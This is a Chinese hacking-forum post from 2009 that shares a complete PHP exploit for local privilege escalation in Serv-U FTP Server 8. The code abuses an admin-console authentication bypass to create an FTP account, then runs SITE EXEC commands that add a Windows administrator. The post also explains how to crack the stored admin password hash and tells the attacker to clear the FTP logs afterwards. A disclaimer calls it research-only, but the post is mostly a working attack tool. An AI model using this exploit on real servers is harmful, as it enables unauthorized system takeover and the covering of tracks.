返回列表 发帖
柔肠寸断

Rank: 15Rank: 15Rank: 15Rank: 15Rank: 15

帖子
3852 
积分
13044 
威望
16780  
金钱
36761  
在线时间
1139 小时 

管理组高手勋章核心成员原创奖章帅哥勋章突出贡献奖优质人品奖章论坛元老管理组成员技术组成员
1 跳转到 » 倒序看帖
打印
tT
发表于 2009-8-13 22:38 | 只看该作者

Serv-U FTP Server v8 本地提权/su8提权

Server, FTP
发布日期:2009-08-05
更新日期:2009-08-05

受影响系统:
serv-u8

不受影响系统:
其他版本不受影响

描述:
看cnbeta发现su出8这个版本了。
想想以前写过一个7的本地提权。
不知道8有什么安全方面的更改。
下载来研究下,发现居然还是可以提权的,只是su7的那个不能直接用,稍微修改了下执行的流程。


Su8的管理平台是http的,继承了su7的方式。
抓包,分析,发现了以下路程是可以利用的。
1, 管理员从管理控制台打开web页面时,是不需要验证密码的。
2, 管理员如果用某URL打开web页面时,虽然需要输入密码,但是无论输入什么,都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
3, 管理员可以添加用户有两种,一种是全局用户,一种是某个域下的用户。而权限设置也是两种,一种是全局,一种是针对用户。
4, 管理员添加了用户的这个包和设置权限这个包,是分开的。
所以,我可以抓包然后转换成php的socket连接post出去。
最后在用经典的ftp登陆,exec命令。达到提权。

前面su7已经说了很多,这里简单的说下好了。
.....登陆什么的。
1,获取ID。
2,给这个id添加权限。
3,给这个id赋予用户名,密码,目录,权限。
4,登陆后执行系统命令。

这段代码是不能直接当工具使用的。
测试方法:

<*来源:www.3ast.com.cn
*>
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
  1. <?
  2. /*
  3. serv-u 8 local exp ver 1.0
  4. 如果你在自己的服务器上发现这个文件,厄。。。那太遗憾了,别来找我。
  5. 这个文件到处都是,人人都能拿到。
  6. */

  8. ?>
  9. <html>
  10. <title>Serv-u 8 local exp ver 1.0</title>
  11. <body>
  12. <script>
  13. function fun_showDiv(show)
  14. {
  15. document.getElementById(show).style.display="block";
  16. }
  17. </script>
  18. <b>Serv-u 8 local exp ver 1.0</b>
  19. <form id="form1" name="form1" method="post" action="?">
  20. <p><a href="#" onclick="fun_showDiv('adminpassdiv')">管理员密码</a>
  21. <input type="text" name="admin_pwd" value="" />
  22. </p>
  23. <p>直接提权!
  24. <input type="submit" name="cmd" value="提权" />
  25. <a href="#" onclick="fun_showDiv('QAdiv')">QA</a>
  26. </p>
  27. <pre>

  29. <?

  31. //Global var
  32. $port=43958;
  33. $host="127.0.0.1";
  34. $sessionid="";
  35. $getuserid="";
  36. $ftpport=21;
  37. $ftpuser="lalala_hacked";
  38. $ftppwd=$_POST['admin_pwd'];
  39. $exec_addUser="site exec c:/windows/system32/net.exe user ".$ftpuser." ".$ftppwd." /add";
  40. $exec_addGroup="site exec c:/windows/system32/net.exe localgroup administrators ".$ftpuser."  /add";

  42. if($_POST['cmd']) {

  44. //login-----------------------------------------
  45. $sock_login = fsockopen($host, $port);
  46. $URL='/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';
  47. $post_data_login['user'] = "";
  48. $post_data_login['pword'] = $ftppwd;
  49. $post_data_login['language'] = "zh%2CCN&";
  50. $ref="http://".$host.":".$port."/?Session=39893&Language=zh,CN&LocalAdmin=1";
  51. $postStr = createRequest($port,$host,$URL,$post_data_login,$sessionid,$ref);
  52. fputs($sock_login, $postStr);
  53. $result = fread($sock_login, 1280);
  54. $sessionid = getmidstr("<sessionid>","</sessionid>",$result);
  55. if ($sessionid!="")
  56. echo "登陆成功!";
  57. fclose($sock_login);
  58. //login-----------------------------------------

  60. //getOrganizationId-------------------------------
  61. $OrganizationId="";
  62. $sock_OrganizationId = fsockopen($host, $port);
  63. $URL='/Admin/ServerUsers.htm?Page=1';
  64. $postStr = createRequest($port,$host,$URL,"",$sessionid,"");
  65. fputs($sock_OrganizationId, $postStr);
  66. $resultOrganizationId="";
  67. while(!feof($sock_OrganizationId)) {
  68. $result = fread($sock_OrganizationId, 1024);
  69. $resultOrganizationId=$resultOrganizationId.$result;
  70. }
  71. $strTmp = "OrganizationUsers.xml&ID=";
  72. $OrganizationId = substr($resultOrganizationId,strpos($resultOrganizationId,$strTmp)+strlen($strTmp),strlen($strTmp)+15);
  73. $OrganizationId = substr($OrganizationId,0,strpos($OrganizationId,"\""));
  74. fclose($sock_OrganizationId);
  75. if ($OrganizationId!="")
  76. echo "获取OrganizationId".$OrganizationId."成功!";
  77. //getOrganizationId-------------------------------

  79. //getuserid---------------------------------------
  80. $getuserid="";
  81. $sock_getuserid = fsockopen($host, $port);
  82. $URL="/Admin/XML/User.xml?Command=AddObject&Object=COrganization.".$OrganizationId.".User&Temp=1&Sync=546666666666666663";
  83. $ref="http://".$host.":".$port."/Admin/ServerUsers.htm?Page=1";
  84. $post_data_getuserid="";
  85. $postStr = createRequest($port,$host,$URL,$post_data_getuserid,$sessionid,$ref);
  86. fputs($sock_getuserid, $postStr);
  87. $result = fread($sock_getuserid, 1280);
  88. $result = getmidstr("<var name=\"ObjectID\" val=\"","\" />",$result);
  89. fclose($sock_getuserid);
  90. $getuserid = $result;
  91. if ($getuserid!="")
  92. echo "获取用户ID".$getuserid."成功!";
  93. //getuserid---------------------------------------

  95. //addpower-----------------------------------------
  96. $sock_addpower = fsockopen($host, $port);
  97. $URL="/Admin/XML/Result.xml?Command=AddObject&Object=CUser.".$getuserid.".DirAccess&Sync=1227081437828";
  98. $post_data_addpower['Access'] = "7999";
  99. $post_data_addpower['MaxSize'] = "0";
  100. $post_data_addpower['Dir'] = "c:\\";
  101. $post_data_addpower['undefined'] = "undefined";
  102. $postStr = createRequest($port,$host,$URL,$post_data_addpower,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");
  103. fputs($sock_addpower, $postStr,strlen($postStr));
  104. $result = fread($sock_addpower, 1280);
  105. fclose($sock_addpower);

  107. echo "添加权限成功!";

  109. //addpower-----------------------------------------

  111. //adduser-----------------------------------------
  112. $sock_adduser = fsockopen($host, $port);
  113. $URL="/Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization.".$OrganizationId.".User.".$getuserid."&Sync=1227071190250";
  114. $post_data_adduser['LoginID'] = $ftpuser;
  115. $post_data_adduser['FullName'] = "";
  116. $post_data_adduser['Password'] = 'hahaha';
  117. $post_data_adduser['ComboPasswordType'] = "%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81";
  118. $post_data_adduser['PasswordType'] = "0";
  119. $post_data_adduser['ComboAdminType'] = "%E6%97%A0%E6%9D%83%E9%99%90";
  120. $post_data_adduser['AdminType'] = "";
  121. $post_data_adduser['ComboHomeDir'] = "/c:";
  122. $post_data_adduser['HomeDir'] = "/c:";
  123. $post_data_adduser['ComboType'] = "%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7";
  124. $post_data_adduser['Type'] = "0";
  125. $post_data_adduser['ExpiresOn'] = "0";
  126. $post_data_adduser['ComboWebClientStartupMode'] = "%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF";
  127. $post_data_adduser['WebClientStartupMode'] = "";
  128. $post_data_adduser['LockInHomeDir'] = "0";
  129. $post_data_adduser['Enabled'] = "1";
  130. $post_data_adduser['AlwaysAllowLogin'] = "1";
  131. $post_data_adduser['Description'] = "";
  132. $post_data_adduser['IncludeRespCodesInMsgFiles'] = "";
  133. $post_data_adduser['ComboSignOnMessageFilePath'] = "";
  134. $post_data_adduser['SignOnMessageFilePath'] = "";
  135. $post_data_adduser['SignOnMessage'] = "";
  136. $post_data_adduser['SignOnMessageText'] = "";
  137. $post_data_adduser['ComboLimitType'] = "%E8%BF%9E%E6%8E%A5";
  138. $post_data_adduser['LimitType'] = "Connection";
  139. $post_data_adduser['QuotaBytes'] = "0";
  140. $post_data_adduser['Quota'] = "0";
  141. $post_data_adduser['Access'] = "7999";
  142. $post_data_adduser['MaxSize'] = "0";
  143. $post_data_adduser['Dir'] = "%25HOME%25";
  144. $postStr = createRequest($port,$host,$URL,$post_data_adduser,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");
  145. fputs($sock_adduser, $postStr,strlen($postStr));
  146. $result = fread($sock_adduser, 1280);
  147. fclose($sock_adduser);

  149. echo "添加用户成功!";
  150. //adduser-----------------------------------------

  152. //exec-------------------------------
  153. $sock_exec = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10);
  154. $recvbuf = fgets($sock_exec, 1024);
  155. $sendbuf = "USER ".$ftpuser."";
  156. fputs($sock_exec, $sendbuf, strlen($sendbuf));
  157. $recvbuf = fgets($sock_exec, 1024);

  159. $sendbuf = "PASS hahaha";
  160. fputs($sock_exec, $sendbuf, strlen($sendbuf));
  161. $recvbuf = fgets($sock_exec, 1024);

  163. $sendbuf = $exec_addUser."";
  164. fputs($sock_exec, $sendbuf, strlen($sendbuf));
  165. $recvbuf = fread($sock_exec, 1024);
  166. echo "执行".$exec_addUser."返回了$recvbuf";
  167. fclose($sock_exec);

  169. $sock_exec = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10);
  170. $recvbuf = fgets($sock_exec, 1024);
  171. $sendbuf = "USER ".$ftpuser."";
  172. fputs($sock_exec, $sendbuf, strlen($sendbuf));
  173. $recvbuf = fgets($sock_exec, 1024);

  175. $sendbuf = "PASS hahaha";
  176. fputs($sock_exec, $sendbuf, strlen($sendbuf));
  177. $recvbuf = fgets($sock_exec, 1024);

  179. $sendbuf = $exec_addGroup."";
  180. fputs($sock_exec, $sendbuf, strlen($sendbuf));
  181. $recvbuf = fread($sock_exec, 1024);

  183. echo "执行".$exec_addGroup."返回了$recvbuf";
  184. fclose($sock_exec);
  185. echo "好了,自己3389上去清理ftp用户日志吧!";
  186. //exec-------------------------------

  188. }

  190. /** function createRequest
  191. @port_post : administrator port $port=43958;
  192. @host_post : host $host="127.0.0.1";
  193. @URL_post : target $URL='/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';
  194. @post_data_post : arraylist $post_data['user'] = "";...
  195. @return httprequest string
  196. */
  197. function createRequest($port_post,$host_post,$URL_post,$post_data_post,$sessionid,$referer){
  198. $data_string="";
  199. if ($post_data_post!="")
  200. {
  201. foreach($post_data_post as $key=>$value)
  202. {
  203. $values[]="$key=".urlencode($value);
  204. }
  205. $data_string=implode("",$values);
  206. }
  207. $request.="POST ".$URL_post." HTTP/1.1";
  208. $request.="Host: ".$host_post."";
  209. $request.="Referer: ".$referer."";
  210. $request.="Content-type: application/x-www-form-urlencoded";
  211. $request.="Content-length: ".strlen($data_string)."";
  212. $request.="User-Agent: Serv-U";
  213. $request.="x-user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)";
  214. $request.="Accept: */*";
  215. $request.="Cache-Contro: no-cache";
  216. $request.="UA-CPU: x86";

  218. if ($sessionid!="")
  219. {
  220. $request.="Cookie: Session=".$sessionid."";
  221. }
  222. $request.="";
  223. $request.=$data_string."";

  225. return $request;
  226. }

  228. //getMidfor2str copy from internet
  229. function getmidstr($L,$R,$str)
  230. {
  231. $int_l=strpos($str,$L);
  232. $int_r=strpos($str,$R);
  233. If ($int_l>-1&&$int_l>-1)
  234. {
  235. $str_put=substr($str,$int_l+strlen($L),($int_r-$int_l-strlen($L)));
  236. return $str_put;
  237. }
  238. else
  239. return "没找到需要的变量";
  240. }
  241. ?>
  242. </pre>
  243. </form>
  244. <div id="adminpassdiv" style="display:none">
  245. <pre>
  246. 默认为空,如果密码为空,<b>填什么都能进去。</b>
  247. 如果修改过,管理员密码默认会在这里:
  248. <b>C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive</b>
  249. 文件中找到一个MD5密码值。
  250. C:\Program Files\RhinoSoft.com\Serv-U
  251. 是su的根目录。
  252. 密码值的样式为(假设是123456)
  253. kx#######################
  254. #代表123456的32位MD5加密,而kx则是su对md5的密码算法改进的随机2位字符。
  255. 破解后的密码为<b>kx</b>123456,去掉kx就是密码了。
  256. 你可以针对这个加密生成字典。

  258. </pre>
  259. </div>
  260. <div id="QAdiv" style="display:none">
  261. <pre>
  262. <b>提权的原理?</b>
  263. Su8的管理平台是http的,继承了su7的方式。
  264. 抓包,分析,发现了以下路程是可以利用的。
  265. 1,  管理员从管理控制台打开web页面时,是不需要验证密码的。
  266. 2,  管理员如果用某URL打开web页面时,虽然需要输入密码,但是无论输入什么,都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
  267. 3,  管理员可以添加用户有两种,一种是全局用户,一种是某个域下的用户。而权限设置也是两种,一种是全局,一种是针对用户。
  268. 4,  管理员添加了用户的这个包和设置权限这个包,是分开的。
  269. 所以,我可以抓包然后转换成php的socket连接post出去。
  270. 最后在用经典的ftp登陆,exec命令。达到提权。

  272. 前面su7已经说了很多,这里简单的说下好了。
  273. .....登陆什么的。
  274. 1,获取ID。
  275. 2,给这个id添加权限。
  276. 3,给这个id赋予用户名,密码,目录,权限。
  277. 4,登陆后执行系统命令。

  279. <b>为啥我明明显示成功了,但是却提不上去?</b>
  280. 这要看错误代码了,这里偶很惭愧,并没有写详细的错误代码判断。
  281. 一般有以下几种情况:
  282. 1,可能是因为管理员密码不对。
  283. 参照管理员密码的连接。
  284. 2,可能是因为管理员限制了执行SITE EXEC。
  285. 有待程序修改,程序可以加一个让他不限制的功能。
  286. 3,可能是程序问题。

  288. </pre>
  289. </div>
  290. </body>
  291. </html>
复制代码
建议:
目前厂商没有任何补丁,要不大家再等等?
不过以前SU7本地溢出推出来,也没见到什么动静。-_-!
先把本地管理密码改复杂点应付着吧。
收藏 分享
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰
于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

林东东321 该用户已被删除
2
发表于 2010-3-14 15:51 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽

TOP

返回列表